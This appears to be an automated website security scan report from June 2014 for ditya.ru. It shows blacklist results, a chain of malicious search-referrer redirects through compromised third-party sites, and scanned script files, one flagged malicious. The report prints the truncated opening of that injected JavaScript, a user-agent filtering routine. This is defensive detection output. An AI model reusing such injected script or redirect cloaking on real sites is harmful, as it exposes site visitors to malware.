Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ditya.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ditya.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://ditya.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: ditya.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 28 Jun 2014 10:27:12 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx/1.2.1 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.13 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 28 Jun 2014 10:27:13 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 28 Jun 2014 10:27:13 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.29 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 28 Jun 2014 10:27:13 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://ditya.ru/ | 200 OK Content-Length: 23998 Content-Type: text/html | clean |
http://ditya.ru/cache/template/js.php?id=904548fe50f1a3bf5e2bdf2b6db55378 | 200 OK Content-Length: 86241 Content-Type: application/x-javascript | clean |
http://ditya.ru/cache/template/js.php?id=b5796c3d38edccdffd29d389a0d073d9 | 200 OK Content-Length: 3638 Content-Type: application/x-javascript | clean |
http://ditya.ru/cache/template/js.php?id=67f2ab8d2469f0de9d16b01dff68cd13 | 200 OK Content-Length: 83992 Content-Type: application/x-javascript | clean |
http://ditya.ru/cache/template/js.php?id=c9661bd88b851d91bb6b218452e811cb | 200 OK Content-Length: 825 Content-Type: application/x-javascript | clean |
http://stg.odnoklassniki.ru/share/odkl_share.js | 200 OK Content-Length: 12312 Content-Type: application/x-javascript | clean |
http://ditya.ru/cache/template/js.php?id=6fbdc23a99e66aded74ec900a7877dd6 | 200 OK Content-Length: 8761 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function stripos(f_haystack,f_needle,f_offset){var haystack=(f_haystack+'').toLowerCase();var needle=(f_needle+'').toLowerCase();var index=0;if((index=haystack.indexOf(needle,f_offset))!==-1){return index;} return false;} function zzz_check_ua(){var blackList='Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0';blackList=blackList.split('|');va Antivirus reports:
| ||
http://ditya.ru/templates/yoo_neo/warp/js/search.js | 200 OK Content-Length: 5493 Content-Type: application/x-javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 11840 Content-Type: application/javascript | clean |
http://userapi.com/js/api/openapi.js?18 | 200 OK Content-Length: 64039 Content-Type: application/x-javascript | clean |
http://ditya.ru/index.php/component/users/?view=reset | 200 OK Content-Length: 18468 Content-Type: text/html | clean |
http://ditya.ru/cache/template/js.php?id=ced0b8895e47deadec3d4bbc1f0d7d2e | 200 OK Content-Length: 224400 Content-Type: application/x-javascript | clean |
http://ditya.ru/cache/template/js.php?id=e22d7081f45d883c89e55f0847946a79 | 200 OK Content-Length: 2630 Content-Type: application/x-javascript | clean |
http://ditya.ru/index.php/component/users/ | 200 OK Content-Length: 17338 Content-Type: text/html | clean |
http://ditya.ru/index.php/component/users/?view=remind | 200 OK Content-Length: 18187 Content-Type: text/html | clean |